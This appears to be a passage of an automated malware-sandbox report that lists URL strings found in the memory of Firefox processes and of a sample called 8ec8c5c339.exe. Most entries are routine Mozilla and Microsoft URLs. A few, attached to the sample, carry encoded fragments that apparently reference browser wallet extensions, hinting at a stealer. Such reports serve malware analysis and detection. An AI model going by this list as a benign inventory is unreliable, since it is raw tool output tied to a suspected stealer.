Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000023.00000002.3317049922.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180D
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Required
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1403293
Source: firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1592344
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000023.00000002.3326407807.0000028631538000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3336295224.0000028631E45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339121279.00000286320B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DAD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/isUnderHiddenEmbedderElement
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/isUnderHiddenEmbedderElementpictureinpicture
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.combrowser.handlers.migrationsaccount-connection-connectednetwork.proxy.
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comzA8
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3334627067.0000028631DB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelbrowser.engagement.session_time_including_suspen
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelchrome://extensions/content/schemas/manifest.jso
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/ContentPrefServiceChild.sys
Source: 8ec8c5c339.exe, 00000008.00000003.2494959406.0000000028D48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.orgmedia.autoplay.blocking_policy_migrateXULStoreForDocumentbookmarksToolbar
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.orgmigrateXULAttributeToStyletestPermissionFromPrincipalcreateContentPrincip
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 00000008.00000003.2415301062.00000000229F1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp, 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.0000000000400000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: 8ec8c5c339.exe, 00000008.00000002.2738630098.000000000043C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://svgwg.org/svg2-draft/struct.html#SymbolNotes:
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com(7O
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/mathml-core/#dfn-maction
Source: firefox.exe, 00000023.00000002.3321697398.0000028631031000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/mathml-core/#dfn-semantics
